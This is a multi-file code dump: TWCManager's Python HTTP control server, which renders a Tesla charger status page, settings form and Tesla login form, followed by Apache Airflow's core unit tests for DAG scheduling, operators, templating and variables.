Data is sent to the workers after every chunk_size calls."""
self.count += 1
if self.count >= self.chunk_size:
self.count = 0
self.send()
|
HTTPControl.py
|
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from termcolor import colored
import threading
import time
import urllib.parse
from ww import f
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
class HTTPControl:
configConfig = {}
configHTTP = {}
debugLevel = 1
httpPort = 8080
master = None
status = False
def __init__(self, master):
self.master = master
try:
self.configConfig = master.config["config"]
except KeyError:
self.configConfig = {}
try:
self.configHTTP = master.config["control"]["HTTP"]
except KeyError:
self.configHTTP = {}
self.debugLevel = self.configConfig.get("debugLevel", 1)
self.httpPort = self.configHTTP.get("listenPort", 8080)
self.status = self.configHTTP.get("enabled", False)
if self.status:
httpd = ThreadingSimpleServer(("", self.httpPort), HTTPControlHandler)
httpd.master = master
self.master.debugLog(
1, "HTTPCtrl ", "Serving at port: " + str(self.httpPort)
)
threading.Thread(target=httpd.serve_forever, daemon=True).start()
class HTTPControlHandler(BaseHTTPRequestHandler):
fields = {}
def do_css(self):
page = "<style>"
page += """
table.darkTable {
font-family: 'Arial Black', Gadget, sans-serif;
border: 2px solid #000000;
background-color: #717171;
width: 60%;
height: 200px;
text-align: center;
border-collapse: collapse;
}
table.darkTable td, table.darkTable th {
border: 1px solid #4A4A4A;
padding: 3px 2px;
}
table.darkTable tbody td {
font-size: 13px;
color: #E6E6E6;
}
table.darkTable tr:nth-child(even) {
background: #888888;
}
table.darkTable thead {
background: #000000;
border-bottom: 3px solid #000000;
}
table.darkTable thead th {
font-size: 15px;
font-weight: bold;
color: #E6E6E6;
text-align: center;
border-left: 2px solid #4A4A4A;
}
table.darkTable thead th:first-child {
border-left: none;
}
table.darkTable tfoot td {
font-size: 12px;
}
#vertical thead,#vertical tbody{
display:inline-block;
}
table.borderless {
font-family: 'Arial Black', Gadget, sans-serif;
border: 0px;
width: 40%;
height: 200px;
text-align: center;
border-collapse: collapse;
}
table.borderless th {
font-size: 15px;
font-weight: bold;
color: #FFFFFF;
background: #212529;
text-align: center;
}
"""
page += "</style>"
return page
def do_chargeSchedule(self):
page = """
<table class='borderless'>
<thead>
<th scope='col'> </th>
<th scope='col'>Sun</th>
<th scope='col'>Mon</th>
<th scope='col'>Tue</th>
<th scope='col'>Wed</th>
<th scope='col'>Thu</th>
<th scope='col'>Fri</th>
<th scope='col'>Sat</th>
</thead>
<tbody>"""
for i in (x for y in (range(6, 24), range(0, 6)) for x in y):
page += "<tr><th scope='row'>%02d</th>" % (i)
for day in (range(0,6)):
page += "<td> </td>"
page += "</tr>"
page += "</tbody>"
page += "</table>"
return page
def do_jsrefresh(self):
page = """
// Only refresh the main page if the browser window has focus, and if
// the input form does not have focus
<script language = 'JavaScript'>
var formFocus = false;
var hasFocus= true;
function formNoFocus() {
formFocus = false;
}
function formHasFocus() {
formFocus = true;
}
window.onblur = function() {
hasFocus = false;
}
window.onfocus = function(){
hasFocus = true;
}
setInterval(reload, 5*1000);
function reload(){
if(hasFocus && !formFocus){
location.reload(true);
}
}
</script> """
return page
def do_navbar(self):
page = """
<p> </p>
<p> </p>
<nav class='navbar fixed-top navbar-dark bg-dark' role='navigation'>
<a class='navbar-brand' href='/'>TWCManager</a>
<link rel='icon' type='image/png' href='https://raw.githubusercontent.com/ngardiner/TWCManager/master/tree/v1.1.8/html/favicon.png'>
<ul class="navbar-nav mr-auto">
<li class="nav-item active">
<a class="nav-link" href="#">Home</a>
</li>
</ul>
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="/policy">Policy</a>
</li>
</ul>
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="#">Schedule</a>
</li>
</ul>
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="/settings">Settings</a>
</li>
</ul>
<ul class='navbar-nav mr-auto'>
<li class='nav-item'>
<a class='nav-link' href='https://github.com/ngardiner/TWCManager'>GitHub</a>
</li>
</ul>
<span class="navbar-text">v1.1.8</span>
</nav>"""
return page
def do_get_policy(self):
page = """
<html>
<head><title>Policy</title></head>
<body>
<table>
<tr><td>Emergency</td></tr>
"""
for policy in self.server.master.getModuleByName("Policy").charge_policy:
page += "<tr><td>" + policy['name'] + "</td></tr>"
for i in range(0, len(policy['match'])):
page += "<tr><td> </td>"
page += "<td>" + policy['match'][i] + "</td>"
page += "<td>" + policy['condition'][i] + "</td>"
page += "<td>" + str(policy['value'][i]) + "</td></tr>"
page += """
</table>
</body>
"""
return page
def do_get_settings(self):
page = """
<html>
<head><title>Settings</title></head>
<body>
<form method=POST action='/settings/save'>
<table>
<tr>
<th>Stop Charging Method</th>
<td>
<select name='chargeStopMode'>"""
page += '<option value="1" '
if self.server.master.settings.get("chargeStopMode", "1") == "1":
page += "selected"
page += ">Tesla API</option>"
page += '<option value="2" '
if self.server.master.settings.get("chargeStopMode", "1") == "2":
page += "selected"
page += ">Stop Responding to Slaves</option>"
page += """
</select>
</td>
</tr>
<tr>
<td> </td>
<td><input type=submit /></td>
</tr>
</table>
</form>
</body>
</html>
"""
return page
def do_GET(self):
url = urllib.parse.urlparse(self.path)
if (
url.path == "/"
or url.path == "/apiacct/True"
or url.path == "/apiacct/False"
):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Send the html message
page = "<html><head>"
page += "<title>TWCManager</title>"
page += (
"<meta name='viewport' content='width=device-width, initial-scale=1'>"
)
page += "<link rel='stylesheet' href='https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' integrity='sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T' crossorigin='anonymous'>"
page += self.do_css()
page += self.do_jsrefresh()
page += "</head>"
page += "<body>"
page += self.do_navbar()
page += "<table border='0' padding='0' margin='0' width='100%'><tr>"
page += "<td valign='top'>"
if url.path == "/apiacct/False":
page += "<font color='red'><b>Failed to log in to Tesla Account. Please check username and password and try again.</b></font>"
if not self.server.master.teslaLoginAskLater and url.path != "/apiacct/True":
# Check if we have already stored the Tesla credentials
# If we can access the Tesla API okay, don't prompt
if (not self.server.master.getModuleByName("TeslaAPI").car_api_available()):
page += self.request_teslalogin()
if url.path == "/apiacct/True":
page += "<b>Thank you, successfully fetched Tesla API token."
page += self.show_status()
page += "</table>"
page += "</body>"
page += "</table>"
page += "</html>"
self.wfile.write(page.encode("utf-8"))
return
if url.path == "/policy":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
page = self.do_get_policy()
self.wfile.write(page.encode("utf-8"))
return
if url.path == "/settings":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
page = self.do_get_settings()
self.wfile.write(page.encode("utf-8"))
return
if url.path == "/tesla-login":
# For security, these details should be submitted via a POST request
# Send a 405 Method Not Allowed in response.
self.send_response(405)
page = "This function may only be requested via the POST HTTP method."
self.wfile.write(page.encode("utf-8"))
return
# All other routes missed, return 404
self.send_response(404)
def do_POST(self):
# Parse URL
url = urllib.parse.urlparse(self.path)
# Parse POST parameters
self.fields.clear()
length = int(self.headers.get("content-length"))
field_data = self.rfile.read(length)
self.fields = urllib.parse.parse_qs(str(field_data))
if url.path == "/settings/save":
# User has submitted settings.
# Call dedicated function
self.process_settings()
return
if url.path == "/tesla-login":
# User has submitted Tesla login.
# Pass it to the dedicated process_teslalogin function
self.process_teslalogin()
return
# All other routes missed, return 404
self.send_response(404)
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def process_settings(self):
# Write settings
for key in self.fields:
keya = str(key).replace("b'", "")
vala = self.fields[key][0].replace("'", "")
self.server.master.settings[keya] = vala
self.server.master.saveSettings()
# Redirect to the index page
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def process_teslalogin(self):
# Check if we are skipping Tesla Login submission
if not self.server.master.teslaLoginAskLater:
later = False
try:
later = len(self.fields["later"])
except KeyError as e:
later = False
if later:
self.server.master.teslaLoginAskLater = True
if not self.server.master.teslaLoginAskLater:
# Connect to Tesla API
carapi = self.server.master.getModuleByName("TeslaAPI")
carapi.setCarApiLastErrorTime(0)
ret = carapi.car_api_available(
self.fields["email"][0], self.fields["password"][0]
)
# Redirect to an index page with output based on the return state of
# the function
self.send_response(302)
self.send_header("Location", "/apiacct/" + str(ret))
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
else:
# User has asked to skip Tesla Account submission for this session
# Redirect back to /
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def request_teslalogin(self):
page = "<form action='/tesla-login' method='POST'>"
page += "<p>Enter your email and password to allow TWCManager to start and "
page += "stop Tesla vehicles you own from charging. These credentials are "
page += "sent once to Tesla and are not stored. Credentials must be entered "
page += "again if no cars are connected to this charger for over 45 days."
page += "</p>"
page += "<input type=hidden name='page' value='tesla-login' />"
page += "<p>"
page += "<table>"
page += "<tr><td>Tesla Account E-Mail:</td>"
page += "<td><input type='text' name='email' value='' onFocus='formHasFocus()' onBlur='formNoFocus()'></td></tr>"
page += "<tr><td>Password:</td>"
page += "<td><input type='password' name='password' onFocus='formHasFocus()' onBlur='formNoFocus()'></td></tr>"
page += "<tr><td><input type='submit' name='submit' value='Log In'></td>"
page += "<td><input type='submit' name='later' value='Ask Me Later'></td>"
page += "</tr>"
page += "</table>"
page += "</p>"
page += "</form>"
return page
def show_status(self):
page = "<table width = '100%'><tr width = '100%'><td width='35%'>"
page += "<table class='table table-dark' width='100%'>"
page += "<tr><th>Amps to share across all TWCs:</th>"
page += "<td>" + str(self.server.master.getMaxAmpsToDivideAmongSlaves()) + "</td>"
page += "<td>amps</td></tr>"
page += "<tr><th>Current Generation</th>"
page += "<td>" + str(self.server.master.getGeneration()) + "</td>"
page += "<td>watts</td>"
genamps = 0
if self.server.master.getGeneration():
genamps = self.server.master.getGeneration() / 240
page += "<td>" + str(genamps) + "</td><td>amps</td></tr>"
page += "<tr><th>Current Consumption</th>"
page += "<td>" + str(self.server.master.getConsumption()) + "</td>"
page += "<td>watts</td>"
conamps = 0
if self.server.master.getConsumption():
conamps = self.server.master.getConsumption() / 240
page += "<td>" + str(conamps) + "</td><td>amps</td></tr>"
page += "<tr><th>Current Charger Load</th>"
page += "<td>" + str(self.server.master.getChargerLoad()) + "</td>"
page += "<td>watts</td>"
page += "</tr>"
page += "<tr><th>Number of Cars Charging</th>"
page += "<td>" + str(self.server.master.num_cars_charging_now()) + "</td>"
page += "<td>cars</td></tr></table></td>"
page += "<td width='30%'>"
page += "<table class='table table-dark' width='100%'>"
page += "<tr><th>Current Policy</th>"
page += "<td>" + str(self.server.master.getModuleByName("Policy").active_policy) + "</td></tr>"
page += "<tr><th>Scheduled Charging Amps</th>"
page += "<td>" + str(self.server.master.getScheduledAmpsMax()) + "</td></tr>"
page += "<tr><th>Scheduled Charging Start Hour</th>"
page += "<td>" + str(self.server.master.getScheduledAmpsStartHour()) + "</td></tr>"
page += "<tr><th>Scheduled Charging End Hour</th>"
page += "<td>" + str(self.server.master.getScheduledAmpsEndHour()) + "</td>"
page += "</tr>"
page += "<tr><th>Is a Green Policy?</th>"
if (self.server.master.getModuleByName("Policy").policyIsGreen()):
page += "<td>Yes</td>";
else:
page += "<td>No</td>";
page += "</tr>"
page += "</table></td>"
page += "<td width = '35%' rowspan = '3'>"
page += self.do_chargeSchedule()
page += "</td></tr>"
page += "<tr><td width = '60%' colspan = '4'>"
page += self.show_twcs()
page += "</td></tr>"
# Handle overflow from calendar
page += "<tr><td> </td></tr></table>"
return page
def show_twcs(self):
page = "<table class='darkTable'>\n"
page += "<thead><tr>"
page += "<th>TWC ID</th>"
page += "<th>State</th>"
page += "<th>Version</th>"
page += "<th>Max Amps</th>"
page += "<th>Amps Offered</th>"
page += "<th>Amps In Use</th>"
page += "<th>Last Heartbeat</th>"
page += "</tr></thead>\n"
lastAmpsTotal = 0
maxAmpsTotal = 0
totalAmps = 0
for slaveTWC in self.server.master.getSlaveTWCs():
page += "<tr>"
page += "<td>%02X%02X</td>" % (slaveTWC.TWCID[0], slaveTWC.TWCID[1])
page += "<td>" + str(slaveTWC.reportedState) + "</td>"
page += "<td>" + str(slaveTWC.protocolVersion) + "</td>"
page += "<td>%.2f</td>" % float(slaveTWC.maxAmps)
maxAmpsTotal += float(slaveTWC.maxAmps)
page += "<td>%.2f</td>" % float(slaveTWC.lastAmpsOffered)
lastAmpsTotal += float(slaveTWC.lastAmpsOffered)
page += "<td>%.2f</td>" % float(slaveTWC.reportedAmpsActual)
totalAmps += float(slaveTWC.reportedAmpsActual)
page += "<td>%.2f sec</td>" % float(time.time() - slaveTWC.timeLastRx)
page += "</tr>\n"
page += "<tr><td><b>Total</b><td> </td><td> </td>"
page += "<td>%.2f</td>" % float(maxAmpsTotal)
page += "<td>%.2f</td>" % float(lastAmpsTotal)
page += "<td>%.2f</td>" % float(totalAmps)
page += "</tr></table>\n"
return page
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.conf.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 19
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
